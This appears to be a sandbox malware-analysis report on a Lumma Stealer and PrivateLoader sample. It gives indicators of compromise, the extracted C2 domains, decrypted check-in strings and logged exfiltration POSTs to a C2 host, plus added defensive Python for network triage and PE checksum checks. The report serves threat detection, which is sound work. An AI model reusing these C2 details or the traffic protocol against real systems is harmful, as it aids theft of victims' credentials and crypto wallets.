
Windows Analysis Report
BnJxmraqlk.exe

Overview

General Information

Sample name: BnJxmraqlk.exe (renamed because the original name is a hash value)
Original sample name: 356bde316f31cfc2ed244a7cdd359617.exe
Analysis ID: 1585281
MD5: 356bde316f31cfc2ed244a7cdd359617
SHA1: 8bbf194502f5d3a15ebb6ab28d37ec2fe47f22a4
SHA256: f37b1604055cfa1d70ea439f2b38cb72a2da74bf6bba76b2e080e16146a53a5e
Tags: exe, user-abuse_ch

Detection

LummaC, PrivateLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PrivateLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Classification chart categories (chart image not reproduced): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious

Process Tree

  • System is w10x64
  • BnJxmraqlk.exe (PID: 612, cmdline: "C:\Users\user\Desktop\BnJxmraqlk.exe", MD5: 356BDE316F31CFC2ED244A7CDD359617)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: PrivateLoader
Description: According to Sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
{
  "C2 url": [
    "framekgirus.shop",
    "spottercurvei.click",
    "nearycrepso.shop",
    "cloudewahsj.shop",
    "tirepublicerj.shop",
    "noisycuttej.shop",
    "wholersorie.shop",
    "rabidcowse.shop",
    "abruptyopsn.shop"
  ],
  "Build id": "hcQl0m--"
}
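The configuration above, together with the DNS and HTTP traffic recorded later in this report, is enough to write a first-pass triage of a network capture for this sample. The Python below is an added example and is not part of the Joe Sandbox report or of the Lumma or PrivateLoader code. It assumes a plain list of already-parsed DNS and HTTP events; the event list is constructed to mirror the requests on this page, not a real capture. The check-in body is an assumption built from the decrypted format string lid=%s&j=%s&ver=4.0 and the build id (the capture on this page shows only headers and lengths), and the multipart size threshold is an arbitrary choice.

```python
import re
from typing import Dict, List, Tuple

# C2 domains exactly as listed in the sandbox's extracted configuration for this sample
LUMMA_STATIC_C2 = {
    "framekgirus.shop", "spottercurvei.click", "nearycrepso.shop",
    "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop",
    "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop",
}
BUILD_ID = "hcQl0m--"  # "Build id" from the extracted configuration

# A SteamID64 profile URL (17 digits), the shape of the GET the sandbox recorded
STEAM_PROFILE_RE = re.compile(r"^/profiles/\d{17}$")
# Shape of the decrypted check-in format string lid=%s&j=%s&ver=4.0
CHECKIN_BODY_RE = re.compile(r"^lid=(?P<lid>[^&]+)&j=(?P<j>[^&]*)&ver=(?P<ver>\d+\.\d+)$")

# Constructed events modelled on this report's DNS queries and HTTP requests.
# Bodies are assumptions; the report shows only request lines, headers and lengths.
EVENTS: List[dict] = [
    {"type": "dns", "query": "abruptyopsn.shop"},
    {"type": "dns", "query": "framekgirus.shop"},
    {"type": "dns", "query": "steamcommunity.com"},
    {"type": "http", "method": "GET", "host": "steamcommunity.com",
     "path": "/profiles/76561199724331900", "content_type": "", "length": 0, "body": ""},
    {"type": "dns", "query": "sputnik-1985.com"},
    {"type": "http", "method": "POST", "host": "sputnik-1985.com", "path": "/api",
     "content_type": "application/x-www-form-urlencoded", "length": 23,
     "body": "lid=hcQl0m--&j=&ver=4.0"},          # assumed body, see lead-in
    {"type": "http", "method": "POST", "host": "sputnik-1985.com", "path": "/api",
     "content_type": "multipart/form-data; boundary=5G3M9VPI83U93M4I1GM",
     "length": 586875, "body": ""},                 # size as recorded in the report
    {"type": "http", "method": "GET", "host": "www.example.com", "path": "/",
     "content_type": "", "length": 0, "body": ""},  # benign control event
]


def lumma_triage(events: List[dict], static_c2=LUMMA_STATIC_C2,
                 exfil_threshold: int = 100_000) -> Dict[str, object]:
    """Classify events against the extracted config and the observed C2 protocol shape."""
    seen_c2: List[str] = []
    dead_drop: List[str] = []
    checkins: List[Tuple[str, str, str]] = []   # (host, lid, ver)
    exfil: List[Tuple[str, int]] = []           # (host, bytes)
    for ev in events:
        if ev["type"] == "dns":
            q = ev["query"].lower().rstrip(".")
            if q in static_c2:
                seen_c2.append(q)
            continue
        if ev["type"] != "http":
            continue
        host, method, path = ev["host"].lower(), ev["method"].upper(), ev["path"]
        if method == "GET" and host == "steamcommunity.com" and STEAM_PROFILE_RE.match(path):
            dead_drop.append(path)
        elif method == "POST" and path == "/api":
            ctype = ev["content_type"].lower()
            m = CHECKIN_BODY_RE.match(ev["body"])
            if ctype.startswith("application/x-www-form-urlencoded") and m:
                checkins.append((host, m["lid"], m["ver"]))
            elif ctype.startswith("multipart/form-data") and ev["length"] >= exfil_threshold:
                exfil.append((host, ev["length"]))
    checkin_hosts = {h for h, _, _ in checkins}
    return {
        "static_c2_resolved": sorted(set(seen_c2)),
        "dead_drop_lookups": dead_drop,
        "checkins": checkins,
        # only count bulk uploads to a host that also received a check-in
        "exfil_posts": [e for e in exfil if e[0] in checkin_hosts],
        # check-in hosts that are absent from the static config were obtained at runtime
        "dynamic_c2_hosts": sorted(checkin_hosts - set(static_c2)),
        "build_id_match": any(lid == BUILD_ID for _, lid, _ in checkins),
    }


if __name__ == "__main__":
    for key, value in lumma_triage(EVENTS).items():
        print(f"{key}: {value}")
```

Two points this report supports and the example is built around: the host that actually received the POST /api traffic, sputnik-1985.com, is not in the static configuration and is only contacted after the GET to steamcommunity.com/profiles/..., the sequence Suricata labels "Lumma Stealer Steam Profile Lookup"; check-in hosts outside the configured list therefore have to be treated as C2 as well (the code does not attempt to decode the profile, which this page does not show). And the observed User-Agent is a stock Chrome 119 string even though TeslaBrowser/5.5 sits among the decrypted strings, so a detection keyed on that user agent alone would have missed this run.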
Yara matches (Source | Rule | Description | Author)

Initial sample:
BnJxmraqlk.exe | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security

PCAP (network traffic):
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Memory dumps:
00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
Process Memory Space: BnJxmraqlk.exe PID: 612 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: BnJxmraqlk.exe PID: 612 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(2 further memory-dump entries are collapsed on the original page)

Unpacked PEs:
0.0.BnJxmraqlk.exe.1c0000.0.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
                    No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol)
2025-01-07T13:17:02.830202+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49713 | 104.102.49.254:443 | TCP
2025-01-07T13:17:04.008393+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49714 | 104.21.48.1:443 | TCP
2025-01-07T13:17:04.851469+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49716 | 104.21.48.1:443 | TCP
2025-01-07T13:17:06.110725+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49722 | 104.21.48.1:443 | TCP
2025-01-07T13:17:11.453443+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49758 | 104.21.48.1:443 | TCP
2025-01-07T13:17:12.721069+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49767 | 104.21.48.1:443 | TCP
2025-01-07T13:17:14.473566+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49783 | 104.21.48.1:443 | TCP
2025-01-07T13:17:15.813918+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49792 | 104.21.48.1:443 | TCP
2025-01-07T13:17:19.762590+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6:49819 | 104.21.48.1:443 | TCP
2025-01-07T13:17:04.333555+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6:49714 | 104.21.48.1:443 | TCP
2025-01-07T13:17:05.326910+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6:49716 | 104.21.48.1:443 | TCP
2025-01-07T13:17:20.231843+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6:49819 | 104.21.48.1:443 | TCP
2025-01-07T13:17:04.333555+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6:49714 | 104.21.48.1:443 | TCP
2025-01-07T13:17:05.326910+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6:49716 | 104.21.48.1:443 | TCP
2025-01-07T13:17:02.089336+0100 | 2058598 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:52520 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.161242+0100 | 2058606 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:59347 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.114724+0100 | 2058610 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:56054 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.077301+0100 | 2058616 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:50553 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.138060+0100 | 2058618 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:54615 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.146376+0100 | 2058622 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:64787 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.126175+0100 | 2058628 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:64159 | 1.1.1.1:53 | UDP
2025-01-07T13:17:02.101884+0100 | 2058632 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49449 | 1.1.1.1:53 | UDP
2025-01-07T13:17:10.766967+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49722 | 104.21.48.1:443 | TCP
2025-01-07T13:17:03.368085+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49713 | 104.102.49.254:443 | TCP


                    AV Detection

Source: spottercurvei.click | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/~ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api:u | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api298 | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apila | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/s& | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/s6 | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apilaV | Avira URL Cloud: Label: malware
Source: 0.2.BnJxmraqlk.exe.1c0000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "spottercurvei.click", "nearycrepso.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop"], "Build id": "hcQl0m--"}
Source: BnJxmraqlk.exe | Virustotal: Detection: 33%
Source: BnJxmraqlk.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: BnJxmraqlk.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: spottercurvei.click
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hcQl0m--

                    Compliance

Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Unpacked PE file: 0.2.BnJxmraqlk.exe.1c0000.0.unpack
Source: BnJxmraqlk.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: Binary string: E:\release-reflect-8\release\x86\working\reflect.pdb | source: BnJxmraqlk.exe
Source: Binary string: wntdll.pdbUGP | source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp
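Two of the static findings in this report, "PE file contains an invalid checksum" and "PE file contains sections with non-standard names", can be reproduced on any sample without the sandbox. The Python below is an added example, not part of the report and not derived from this sample's code: it computes the PE/COFF CheckSum with the same 32-bit word-sum algorithm that pefile implements and lists section names outside the usual toolchain set. STANDARD_SECTIONS is an illustrative allow-list, and build_minimal_pe produces a constructed header-only fixture so the block runs offline; for real use pass the bytes of a file on disk to analyze_pe.

```python
import struct
from typing import Dict, List

# Section names normally emitted by mainstream Windows toolchains; this allow-list is
# an illustrative choice, not an authoritative one. Anything else is reported, which is
# the observation behind "PE file contains sections with non-standard names".
STANDARD_SECTIONS = {
    ".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
    ".reloc", ".tls", ".pdata", ".CRT", ".debug", ".xdata", ".didat",
}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE/COFF CheckSum over the whole file, skipping the CheckSum field itself.

    32-bit word sum with end-around carry, folded to 16 bits, plus the file length
    (the algorithm pefile's generate_checksum implements). Assumes the field is
    4-byte aligned, which holds for any normally aligned e_lfanew."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset // 4
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    return (total & 0xFFFF) + len(data)


def analyze_pe(data: bytes) -> Dict[str, object]:
    """Compare stored vs. computed CheckSum and list non-standard section names."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    optional = coff + 20
    checksum_offset = optional + 0x40            # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    computed = pe_checksum(data, checksum_offset)
    section_table = optional + size_of_optional  # 40-byte IMAGE_SECTION_HEADERs
    names: List[str] = []
    for n in range(num_sections):
        raw = data[section_table + 40 * n: section_table + 40 * n + 8]
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    return {
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_valid": stored == computed,
        "checksum_set": stored != 0,
        "sections": names,
        "nonstandard_sections": [n for n in names if n not in STANDARD_SECTIONS],
    }


def build_minimal_pe(section_names: List[str], checksum: int = 0) -> bytes:
    """Constructed fixture: a header-only PE32 image, parseable but not loadable."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew
    coff = bytearray(20)
    struct.pack_into("<H", coff, 0, 0x14C)         # IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", coff, 2, len(section_names))
    struct.pack_into("<H", coff, 16, 224)          # SizeOfOptionalHeader for PE32
    optional = bytearray(224)
    struct.pack_into("<H", optional, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", optional, 0x40, checksum)
    sections = bytearray()
    for name in section_names:
        hdr = bytearray(40)
        hdr[0:8] = name.encode("ascii")[:8].ljust(8, b"\0")
        sections += hdr
    return bytes(dos + b"PE\0\0" + coff + optional + sections)


if __name__ == "__main__":
    image = build_minimal_pe([".text", ".rdata", ".rsrc", ".k3y9"])
    print(analyze_pe(image))
```

A zero CheckSum is common in unsigned third-party binaries and is not suspicious on its own; a non-zero value that no longer verifies means the file was modified after linking, which is why the sandbox lists it next to its unpacking observation. Windows enforces the checksum only for drivers and some system images, so treat this as a triage signal rather than a loader-level control.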

                    Spreading

Source: Yara match | File source: BnJxmraqlk.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: number of queries: 1001

                    Networking

Source: Network traffic | Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:50553 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.6:64159 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.6:49449 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.6:54615 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.6:59347 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.6:64787 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:52520 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.6:56054 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49713 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49722 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49819 -> 104.21.48.1:443
Source: Yara match | File source: BnJxmraqlk.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: spottercurvei.click
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49767 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49783 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49792 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49758 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49819 -> 104.21.48.1:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 42; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=WW7R38ADA900WJ; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12830; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=OOG2NDWT1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15046; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=12HYARPH96; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 19910; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=Z2XGBDWYJ5FRQRE; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 922; Host: sputnik-1985.com
